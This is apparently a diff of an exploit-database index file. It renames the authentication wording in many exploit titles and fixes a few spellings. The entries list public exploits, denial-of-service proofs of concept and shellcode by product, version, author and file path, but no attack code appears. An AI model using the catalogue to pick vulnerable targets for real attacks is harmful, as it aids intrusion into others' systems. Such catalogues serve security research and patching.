11735,platforms/php/webapps/11735.php,"DZCP (deV!L_z Clanportal) 1.5.2 - Remote File Inclusion",2010-03-14,"cr4wl3r ",php,webapps,0 18428,platforms/php/webapps/18428.txt,"HostBill App 2.3 - Remote Code Injection",2012-01-30,Dr.DaShEr,php,webapps,0 -11736,platforms/linux/dos/11736.py,"Kerio MailServer 6.2.2 - Pre-Authentication Remote Denial of Service (PoC)",2006-12-14,"Evgeny Legerov",linux,dos,389 +11736,platforms/linux/dos/11736.py,"Kerio MailServer 6.2.2 - Unauthenticated Remote Denial of Service (PoC)",2006-12-14,"Evgeny Legerov",linux,dos,389 11737,platforms/php/webapps/11737.txt,"PhpMyLogon 2.0 - SQL Injection",2010-03-14,blake,php,webapps,0 11738,platforms/php/webapps/11738.txt,"Joomla Component com_gcalendar Suite 2.1.5 - Local File Inclusion",2010-03-15,jdc,php,webapps,0 11739,platforms/php/webapps/11739.txt,"PHP Classifieds 7.5 - Blind SQL Injection",2010-03-15,ITSecTeam,php,webapps,0 11740,platforms/php/webapps/11740.txt,"Ninja RSS Syndicator 1.0.8 - Local File Inclusion",2010-03-15,jdc,php,webapps,0 11741,platforms/php/webapps/11741.txt,"Phenix 3.5b - SQL Injection",2010-03-15,ITSecTeam,php,webapps,0 -11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Buffer Overflow (Metasploit)",2010-03-15,blake,windows,remote,0 +11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Buffer Overflow (Metasploit)",2010-03-15,blake,windows,remote,0 11743,platforms/php/webapps/11743.txt,"Joomla Component com_rpx Ulti RPX 2.1.0 - Local File Inclusion",2010-03-15,jdc,php,webapps,0 11744,platforms/php/webapps/11744.txt,"Duhok Forum 1.0 script - Cross-Site Scripting",2010-03-15,indoushka,php,webapps,0 11745,platforms/php/webapps/11745.txt,"FreeHost 1.00 - Arbitrary File Upload",2010-03-15,indoushka,php,webapps,0 @@ -10802,15 +10801,15 @@ id,file,description,date,author,platform,type,port 11806,platforms/php/webapps/11806.txt,"nensor CMS 2.01 - Multiple Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0 11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Inclusion",2010-03-18,"cr4wl3r ",php,webapps,0 11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-03-19,Red-D3v1L,php,webapps,0 -11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP server 1.0.0 - Pre-Authentication Denial of Service (PoC)",2010-03-19,loneferret,windows,dos,21 -11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21 +11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP server 1.0.0 - Unauthenticated Denial of Service (PoC)",2010-03-19,loneferret,windows,dos,21 +11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21 11811,platforms/php/webapps/11811.txt,"PHPscripte24 Preisschlacht Liveshop System SQL Injection - (seite&aid) index.php",2010-03-19,"Easy Laster",php,webapps,0 11813,platforms/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multi Cross-Site Request Forgery",2010-03-19,K053,php,webapps,0 11814,platforms/php/webapps/11814.txt,"joomla Component & plugin JE Tooltip 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0 11815,platforms/php/webapps/11815.txt,"joomla Component Gift Exchange com_giftexchange 1.0 Beta - (pkg) SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps,0 11816,platforms/php/webapps/11816.txt,"Pay Per Watch & Bid Auktions System - (id_auk) auktion.php Blind SQL Injection",2010-03-20,"Easy Laster",php,webapps,0 11817,platforms/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution via Cross Application Scripting",2010-03-20,emgent,multiple,remote,0 -11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack Buffer Overflow (1)",2010-03-20,corelanc0d3r,windows,remote,0 +11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1)",2010-03-20,corelanc0d3r,windows,remote,0 11822,platforms/hardware/remote/11822.txt,"ZKSoftware Biometric Attendence Managnmnet Hardware[MIPS] 2 - Improper Authentication",2010-03-20,fb1h2s,hardware,remote,0 11823,platforms/cgi/webapps/11823.txt,"Trouble Ticket Software - ttx.cgi Remote File Download",2010-03-20,n01d,cgi,webapps,0 11824,platforms/php/webapps/11824.py,"Woltlab Burning Board Teamsite Hack 3.0 - ts_other.php SQL Injection",2010-03-21,"Easy Laster",php,webapps,0 @@ -10859,7 +10858,7 @@ id,file,description,date,author,platform,type,port 11874,platforms/php/webapps/11874.txt,"INVOhost - SQL Injection",2010-03-25,"Andrés Gómez",php,webapps,0 11875,platforms/php/webapps/11875.py,"Easy-Clanpage 2.01 - SQL Injection",2010-03-25,"Easy Laster",php,webapps,0 11876,platforms/php/webapps/11876.txt,"justVisual 2.0 - 'index.php' Local File Inclusion",2010-03-25,eidelweiss,php,webapps,0 -11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack Buffer Overflow (2)",2010-03-25,sud0,windows,remote,21 +11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (2)",2010-03-25,sud0,windows,remote,21 11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - Denial of Service",2010-03-25,_SuBz3r0_,windows,dos,69 11879,platforms/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0 11880,platforms/hardware/dos/11880.txt,"Lexmark Multiple Laser printers - Remote Stack Overflow",2010-03-25,"Francis Provencher",hardware,dos,0 @@ -10971,7 +10970,7 @@ id,file,description,date,author,platform,type,port 12007,platforms/php/webapps/12007.txt,"SimpNews 2.16.2 - Multiple SQL Injections",2010-04-01,NoGe,php,webapps,0 12008,platforms/windows/local/12008.pl,"TugZip 3.5 - '.ZIP' File Buffer Overflow",2010-04-01,Lincoln,windows,local,0 12009,platforms/php/webapps/12009.html,"CMS Made Simple 1.7 - Cross-Site Request Forgery",2010-04-02,"pratul agrawal",php,webapps,0 -12010,platforms/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorization header Denial of Service",2010-04-02,"zombiefx darkernet",windows,dos,0 +12010,platforms/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorisation Header Denial of Service",2010-04-02,"zombiefx darkernet",windows,dos,0 12011,platforms/windows/dos/12011.txt,"Google Chrome 4.1 - OOB Array Indexing Bug",2010-04-02,"Tobias Klein",windows,dos,0 12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - Exploit (2)",2010-04-02,"Richard leahy",windows,local,0 12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0 @@ -11000,7 +10999,7 @@ id,file,description,date,author,platform,type,port 12041,platforms/php/webapps/12041.txt,"Solutive CMS - SQL Injection",2010-04-04,"Th3 RDX",php,webapps,0 12042,platforms/php/webapps/12042.txt,"x10 mirco blogging 121 - SQL Injection",2010-04-04,ITSecTeam,php,webapps,0 12043,platforms/php/webapps/12043.html,"Prediction League 0.3.8 - Cross-Site Request Forgery (Create Admin User) Exploit",2010-04-04,indoushka,php,webapps,0 -12044,platforms/windows/remote/12044.c,"Easy Ftp Server 1.7.0.2 - MKD Remote Post-Authentication Buffer Overflow",2010-04-04,x90c,windows,remote,0 +12044,platforms/windows/remote/12044.c,"Easy Ftp Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow",2010-04-04,x90c,windows,remote,0 12045,platforms/php/webapps/12045.html,"MunkyScripts Simple Gallery - SQL Injection",2010-04-04,ITSecTeam,php,webapps,0 12047,platforms/php/webapps/12047.html,"nodesforum 1.033 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0 12048,platforms/php/webapps/12048.html,"ttCMS 5.0 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0 @@ -11405,7 +11404,7 @@ id,file,description,date,author,platform,type,port 12492,platforms/windows/dos/12492.html,"Firefox 3.6.3 - Fork Bomb Denial of Service",2010-05-03,Dr_IDE,windows,dos,0 12493,platforms/multiple/dos/12493.html,"All Browsers - Long Unicode Denial of Service (PoC)",2010-05-03,Dr_IDE,multiple,dos,0 12494,platforms/windows/dos/12494.pl,"Winamp 5.572 - Local Crash (PoC)",2010-05-03,R3d-D3V!L,windows,dos,0 -12495,platforms/windows/remote/12495.pl,"ProSSHD 1.2 - Remote Post-Authentication Exploit (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",windows,remote,0 +12495,platforms/windows/remote/12495.pl,"ProSSHD 1.2 - Remote Authenticated Exploit (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",windows,remote,0 12496,platforms/php/webapps/12496.html,"KubeBlog - Cross-Site Request Forgery",2010-05-03,The.Morpheus,php,webapps,0 12497,platforms/windows/local/12497.c,"PhotoFiltre Studio X - '.tif' Local Buffer Overflow (PoC)",2010-05-04,"fl0 fl0w",windows,local,0 12498,platforms/windows/remote/12498.txt,"VicFTPS 5.0 - Directory Traversal",2010-05-04,chr1x,windows,remote,0 @@ -11582,7 +11581,7 @@ id,file,description,date,author,platform,type,port 12686,platforms/php/webapps/12686.txt,"Online University - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0 12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - '.wav' (PoC)",2010-05-21,ahwak2000,windows,dos,0 12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - 'gallery.php' Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0 -12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration console - (Post-Authentication) Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0 +12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration console - (Authenticated) Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0 12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,php,webapps,0 12691,platforms/php/webapps/12691.txt,"Online Job Board - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0 14322,platforms/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0 @@ -11630,7 +11629,7 @@ id,file,description,date,author,platform,type,port 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - 'news.php' SQL Injection",2010-05-25,"Dr.SiLnT HilL",php,webapps,0 12737,platforms/php/webapps/12737.txt,"Simpel Side - 'index2.php' SQL Injection",2010-05-25,MN9,php,webapps,0 12740,platforms/windows/dos/12740.py,"Webby WebServer - PoC SEH control",2010-05-25,m-1-k-3,windows,dos,0 -12741,platforms/windows/dos/12741.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Pre-Authentication Denial of Service",2010-05-25,Dr_IDE,windows,dos,0 +12741,platforms/windows/dos/12741.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Unauthenticated Denial of Service",2010-05-25,Dr_IDE,windows,dos,0 12743,platforms/php/webapps/12743.txt,"web5000 - (page_show) SQL Injection",2010-05-25,"BLack Revenge",php,webapps,0 12744,platforms/php/webapps/12744.txt,"Webit CMS - SQL Injection",2010-05-25,CoBRa_21,php,webapps,0 12746,platforms/php/webapps/12746.txt,"Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-26,XroGuE,php,webapps,0 @@ -12255,7 +12254,7 @@ id,file,description,date,author,platform,type,port 13902,platforms/asp/webapps/13902.txt,"Ananda Image Gallery - SQL Injection",2010-06-17,"L0rd CrusAd3r",asp,webapps,0 13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - (SEH) Exploit",2010-06-17,b0nd,windows,remote,0 13904,platforms/php/webapps/13904.txt,"Planet 1.1 - [Cross-Site Request Forgery] Add Admin Account",2010-06-17,G0D-F4Th3r,php,webapps,0 -13905,platforms/windows/local/13905.py,"BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ALSR + DEP Bypass)",2010-06-17,mr_me,windows,local,0 +13905,platforms/windows/local/13905.py,"BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ASLR + DEP Bypass)",2010-06-17,mr_me,windows,local,0 13906,platforms/novell/dos/13906.txt,"Netware - SMB Remote Stack Overflow (PoC)",2010-06-17,"laurent gaffie",novell,dos,139 13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local Buffer Overflow (EIP & SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0 13908,platforms/lin_x86-64/shellcode/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 @@ -12582,7 +12581,7 @@ id,file,description,date,author,platform,type,port 14309,platforms/windows/remote/14309.html,"RSP MP3 Player OCX 3.2 - ActiveX Buffer Overflow",2010-07-09,blake,windows,remote,0 14308,platforms/php/webapps/14308.txt,"WordPress Firestats Plugin - Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0 15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow Denial of Service",2010-10-23,d0lc3,windows,dos,0 -14310,platforms/php/webapps/14310.js,"dotDefender 3.8-5 - Pre-Authentication Remote Code Execution (via Cross-Site Scripting)",2010-07-09,rAWjAW,php,webapps,80 +14310,platforms/php/webapps/14310.js,"dotDefender 3.8-5 - Unauthenticated Remote Code Execution (via Cross-Site Scripting)",2010-07-09,rAWjAW,php,webapps,80 14313,platforms/php/webapps/14313.txt,"Joomla MyHome Component (com_myhome) - Blind SQL Injection",2010-07-10,Sid3^effects,php,webapps,0 14315,platforms/php/webapps/14315.txt,"Joomla MySms Component (com_mysms) - Arbitrary File Upload",2010-07-10,Sid3^effects,php,webapps,0 14335,platforms/php/webapps/14335.txt,"Joomla Health & Fitness Stats - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0 @@ -12650,10 +12649,10 @@ id,file,description,date,author,platform,type,port 14397,platforms/windows/local/14397.rb,"MoreAmp - Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local,0 14404,platforms/php/webapps/14404.txt,"Kayako eSupport 3.70.02 - 'functions.php' SQL Injection",2010-07-18,ScOrPiOn,php,webapps,0 14405,platforms/php/webapps/14405.txt,"PHP-Fusion - Remote Command Execution",2010-07-18,"ViRuS Qalaa",php,webapps,0 -14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - (Post-Authentication) 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0 -14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0 +14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0 +14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0 14401,platforms/asp/webapps/14401.txt,"ClickAndRank Script - Authentication Bypass",2010-07-18,walid,asp,webapps,0 -14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - (Post-Authentication) 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0 +14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0 14403,platforms/windows/local/14403.txt,"Microsoft Windows - Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0 14406,platforms/bsd/local/14406.pl,"Ghostscript - '.PostScript' File Stack Overflow",2010-07-18,"Rodrigo Rubira Branco",bsd,local,0 14407,platforms/aix/remote/14407.c,"rpc.pcnfsd - Remote Format String",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0 @@ -12693,7 +12692,7 @@ id,file,description,date,author,platform,type,port 14448,platforms/php/webapps/14448.txt,"Joomla Component (com_golfcourseguide) 0.9.6.0 (Beta) / 1 (Beta) - SQL Injection",2010-07-23,Valentin,php,webapps,0 14449,platforms/php/webapps/14449.txt,"Joomla Component (com_huruhelpdesk) - SQL Injection",2010-07-23,Amine_92,php,webapps,0 14450,platforms/php/webapps/14450.txt,"Joomla Component (com_iproperty) - SQL Injection",2010-07-23,Amine_92,php,webapps,0 -14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 +14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 14452,platforms/linux/dos/14452.txt,"FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0 14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0 14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0 @@ -12722,7 +12721,7 @@ id,file,description,date,author,platform,type,port 14484,platforms/windows/dos/14484.html,"Microsoft Internet Explorer 6 / 7 - Remote Denial of Service",2010-07-27,"Richard leahy",windows,dos,0 14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",php,webapps,0 14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys 1.5.2.755 - Privilege Escalation",2010-07-28,th_decoder,windows,local,0 -14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - (Post-Authentication) HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 +14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - (Authenticated) HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local,0 14488,platforms/php/webapps/14488.txt,"joomla Component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0 14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 - utf8 Directory Traversal (2)",2010-07-28,mywisdom,unix,remote,0 @@ -12819,7 +12818,7 @@ id,file,description,date,author,platform,type,port 14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0 14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0 14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition - Permanent Cross-Site Scripting",2010-08-11,fdiskyou,php,webapps,0 -14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - (Post-Authentication) Multiple Commands Remote Buffer Overflow",2010-08-11,"Glafkos Charalambous ",windows,remote,21 +14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflow",2010-08-11,"Glafkos Charalambous ",windows,remote,21 14624,platforms/windows/dos/14624.py,"JaMP Player 4.2.2.0 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0 14625,platforms/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0 14628,platforms/win_x86/webapps/14628.txt,"PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion",2010-08-12,LoSt.HaCkEr,win_x86,webapps,80 @@ -13185,7 +13184,7 @@ id,file,description,date,author,platform,type,port 15139,platforms/asp/webapps/15139.txt,"AtomatiCMS - Upload Arbitrary File",2010-09-28,Abysssec,asp,webapps,0 15141,platforms/php/webapps/15141.txt,"JE CMS 1.0.0 - Authentication Bypass (via SQL Injection)",2010-09-28,Abysssec,php,webapps,0 15144,platforms/windows/webapps/15144.txt,"Aleza Portal 1.6 - Insecure (SQL Injection) Cookie Handling",2010-09-28,KnocKout,windows,webapps,0 -15145,platforms/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorization Flaws",2010-09-28,"Pablo Milano",php,webapps,0 +15145,platforms/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorisation Flaws",2010-09-28,"Pablo Milano",php,webapps,0 15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - Cross-Site Request Forgery",2010-09-28,"Pablo Milano",php,webapps,0 15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent Cross-Site Scripting",2010-09-28,"SecPod Research",php,webapps,0 15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0 @@ -13259,7 +13258,7 @@ id,file,description,date,author,platform,type,port 15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - '.m3u' Buffer Overflow",2010-11-23,0v3r,windows,local,0 15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution",2010-11-23,Rew,windows,remote,0 15601,platforms/windows/remote/15601.html,"ImageShack Toolbar 4.8.3.75 - Remote Code Execution",2010-11-23,Rew,windows,remote,0 -15602,platforms/php/webapps/15602.txt,"PHPMotion 1.62 - 'FCKeditor' File Upload",2010-11-23,trycyber,php,webapps,0 +15602,platforms/php/webapps/15602.txt,"PHPMotion 1.62 - 'FCKeditor' Arbitrary File Upload",2010-11-23,trycyber,php,webapps,0 15605,platforms/php/webapps/15605.txt,"Getsimple CMS 2.01 < 2.02 - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0 15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 - '.m3u' Buffer Overflow",2010-10-10,"Anastasios Monachos",windows,dos,0 15230,platforms/asp/webapps/15230.txt,"Site2Nite Auto e-Manager - SQL Injection",2010-10-10,KnocKout,asp,webapps,0 @@ -13364,7 +13363,7 @@ id,file,description,date,author,platform,type,port 15346,platforms/multiple/dos/15346.c,"Platinum SDK Library - post upnp sscanf Buffer Overflow",2010-10-28,n00b,multiple,dos,0 15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - soap_action_name post upnp sscanf Buffer Overflow",2010-10-28,n00b,windows,remote,0 15348,platforms/php/webapps/15348.txt,"Pub-Me CMS - Blind SQL Injection",2010-10-28,H4f,php,webapps,0 -15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Post-Authentication Directory Traversal",2010-10-29,chr1x,windows,remote,0 +15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0 15350,platforms/php/webapps/15350.rb,"PHPKit 1.6.1 R2 - overview.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0 15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System 7.5 - game.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0 15352,platforms/windows/remote/15352.html,"Firefox 3.6.8 < 3.6.11 - Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0 @@ -13761,7 +13760,7 @@ id,file,description,date,author,platform,type,port 15839,platforms/windows/dos/15839.php,"Microsoft Windows Fax Services Cover Page Editor - '.cov' Memory Corruption",2010-12-28,rgod,windows,dos,0 15840,platforms/php/webapps/15840.txt,"ardeaCore 2.25 - PHP Framework Remote File Inclusion",2010-12-29,n0n0x,php,webapps,0 15842,platforms/hardware/remote/15842.txt,"DD-WRT 24-preSP2 - Information Disclosure",2010-12-29,"Craig Heffner",hardware,remote,0 -15843,platforms/php/webapps/15843.txt,"News Script PHP Pro - 'FCKeditor' File Upload",2010-12-29,Net.Edit0r,php,webapps,0 +15843,platforms/php/webapps/15843.txt,"News Script PHP Pro - 'FCKeditor' Arbitrary File Upload",2010-12-29,Net.Edit0r,php,webapps,0 15846,platforms/php/webapps/15846.txt,"kaibb 1.0.1 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 15847,platforms/php/webapps/15847.txt,"DzTube - SQL Injection",2010-12-29,"errnick qwe",php,webapps,0 15848,platforms/php/webapps/15848.txt,"PHP-AddressBook 6.2.4 - (group.php) SQL Injection",2010-12-29,hiphop,php,webapps,0 @@ -13984,7 +13983,7 @@ id,file,description,date,author,platform,type,port 16145,platforms/windows/remote/16145.pl,"Unreal Tournament - Remote Buffer Overflow (SEH)",2011-02-09,Fulcrum,windows,remote,0 16183,platforms/php/webapps/16183.txt,"GAzie 5.10 - (Login Parameter) Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps,0 16165,platforms/php/webapps/16165.txt,"AWCM 2.2 Final - Persistent Cross-Site Script",2011-02-14,_84kur10_,php,webapps,0 -16166,platforms/windows/dos/16166.py,"Microsoft Windows 2003 - AD Pre-Authentication BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0 +16166,platforms/windows/dos/16166.py,"Microsoft Windows 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0 16148,platforms/php/webapps/16148.txt,"SourceBans 1.4.7 - Cross-Site Scripting",2011-02-09,Sw1tCh,php,webapps,0 16149,platforms/hardware/remote/16149.txt,"Linksys WAP610N - Unauthenticated Root Access Security",2011-02-10,"Matteo Ignaccolo",hardware,remote,0 16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - (TYPE) Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0 @@ -14005,7 +14004,7 @@ id,file,description,date,author,platform,type,port 16176,platforms/windows/remote/16176.pl,"ActFax Server (LPD/LPR) 4.25 Build 0221 (2010-02-11) - Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0 16175,platforms/php/webapps/16175.txt,"Seo Panel 2.2.0 - SQL Injection",2011-02-15,"High-Tech Bridge SA",php,webapps,0 -16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Post-Authentication) Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0 +16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Authenticated) Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0 16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0 16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0 16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv' Denial of Service",2011-02-17,b0telh0,windows,dos,0 @@ -14087,7 +14086,7 @@ id,file,description,date,author,platform,type,port 16276,platforms/php/webapps/16276.txt,"ADAN Neuronlabs - 'view.php' SQL Injection",2011-03-04,IRAQ_JAGUAR,php,webapps,0 16278,platforms/ios/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,ios,remote,0 16279,platforms/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,"AtT4CKxT3rR0r1ST ",php,webapps,0 -16280,platforms/php/webapps/16280.py,"Vtiger CRM 5.0.4 - Pre-Authentication Local File Inclusion",2011-03-05,TecR0c,php,webapps,0 +16280,platforms/php/webapps/16280.py,"Vtiger CRM 5.0.4 - Unauthenticated Local File Inclusion",2011-03-05,TecR0c,php,webapps,0 16281,platforms/php/webapps/16281.txt,"BoutikOne - 'description.php' SQL Injection",2011-03-05,IRAQ_JAGUAR,php,webapps,0 16283,platforms/win_x86/shellcode/16283.txt,"Win32 - eggsearch Shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0 16284,platforms/unix/dos/16284.rb,"Subversion - Date Svnserve",2010-08-07,Metasploit,unix,dos,0 @@ -14579,22 +14578,22 @@ id,file,description,date,author,platform,type,port 16771,platforms/windows/remote/16771.rb,"EasyFTP Server 1.7.0.11 - list.html path Stack Buffer Overflow",2010-08-17,Metasploit,windows,remote,8080 16772,platforms/windows/remote/16772.rb,"EFS Easy Chat Server - Authentication Request Handling Buffer Overflow",2010-08-06,Metasploit,windows,remote,80 16773,platforms/windows/remote/16773.rb,"Novell eDirectory NDS Server - Host Header 